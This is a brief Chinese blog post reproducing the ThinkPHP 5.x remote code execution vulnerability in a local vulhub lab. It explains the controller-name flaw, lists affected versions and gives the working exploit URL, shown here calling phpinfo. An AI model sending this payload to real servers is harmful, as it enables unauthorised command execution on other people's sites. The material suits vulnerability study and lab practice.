漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
影响范围
5.0
5.1
复现过程
这里使用5.0.20版本
使用vulhub
cd /vulhub/thinkphp/5-rce 进入
docker-compose up -d 启动
访问
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
版权声明:本文为Snowflake1997原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。